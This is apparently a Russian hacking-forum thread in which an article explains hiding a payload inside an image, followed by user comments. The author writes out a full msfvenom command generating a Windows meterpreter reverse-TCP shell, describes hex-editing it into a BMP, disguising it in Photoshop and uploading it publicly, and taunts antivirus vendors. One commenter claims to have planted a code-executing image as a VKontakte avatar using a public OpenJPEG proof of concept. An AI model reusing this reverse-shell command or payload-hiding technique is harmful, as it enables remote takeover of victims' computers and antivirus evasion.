• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Злая КАРТИНКА Payload

Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt

1.png


как видите у нас получился пэйлод размером 510 байт! Открываем его в текст. редакторе, убираем лишнее с помощью "найти и заменить"

2.png


3.png


4.png

Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!

Screenshot_8.png



переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!

5.png


6.png

7.png

8.png

смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"

Screenshot_9.png

Screenshot_10.png

Screenshot_11.png

Screenshot_12.png


Screenshot_13.png


Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

9.png


допишу как освобожксь... в хату ломится отдел "К")) Колян.. по кличке "сан-техник" Окрестили Мы его так потому что он в молодости ограбил склад с сантехникой, ох как мы тогда гуляли мммм..... как Боги)))

ПС Хочу передать горячий и пламенный привет, труженникам антивирусных компаний смотрите так ребятки, не за брызгайте желчью свои экраны!))))))

продолжение следует!
 
Последнее редактирование:

Celestial

Green Team
20.12.2016
81
91
BIT
0
короче ясно все... разжевать. Что можно мне разжевать. ты лезешь в ебеня, я без мата уже не могу. он выполняет на стороне клиента, но сука, про какую уязвимость идет речь? если я напишу скрипт , сохраню его в .png, а затем другим скриптом форматну обратно в .py, это мать ее эксплуатация уязвимости? я понимаю, что если бы этот файл при заливке на серв переполнял буфер кучи и код в файле выполнялся непосредственно - вот эксплуатация. Вопрос был в том "КАК", ты же начал х%й пойми о чем говорить.

Поддерживаю. Автор статьи, как и собственно сама его "писанина", сильно разочаровали. Я уж умолчу о самой форме повествования, жаргоне и грамматике.
Пришлось вычитывать 6 страниц комментариев, включающих совершенно сомнительную форму юмора в отношении недостаточно эрудированного участника форума, чтобы понять о чем идет речь.

a113, то, что тебя интересует можешь найти здесь:

poc/openjpeg at master · ProbeFuzzer/poc · GitHub


Модифицировал свою аватарку указанным в ресурсах выше образом и снова установил на профиль вконтакте.
Если ее скачать и попробовать открыть, то выполнится код. Ну или, как минимум, комп зависнет до перезагрузки.
 
  • Нравится
Реакции: OneDollar и a113

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
photo_2019-12-30_14-00-08.jpg


чуть по менял концепцию но тема та же))

в общем АВАСТ с Новым Годом!)))) ты мне сука пол года мозг делал) но я тебя победил!
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!